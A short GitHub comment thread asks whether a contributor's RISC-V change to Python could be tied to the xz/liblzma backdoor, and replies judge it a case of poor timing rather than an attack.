Not saying that person is involved in this, could just be poor timing (everything can look suspicious due to hindsight). Person was perhaps just excited to have added the RISC-V feature and wanted to see other projects use it. And it is for different architecture than the known backdoor. Just wondered if this risked adding a form of backdoor to python at the time, even as accident.

@wibeipummedo

"Person was perhaps just excited" is likely "Person is paid to improve RISC-V support".

As @redcode already mentioned is a person who is active for a decade in Github, it looks quite different to the identities of the attacker.

The test files are in this test were just used in a small testcase to compare whether the output is as expected.

The exploit is that liblzma was used to add a backdoor to one specific program (sshd), none of that could have added a backdoor to Python by accident.

Python upstream seems happy with the general change and not suspicious even after the xz exploit is known.

There is nothing that strikes me about this person as being part of the attack, "poor timing" would be my first impression.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment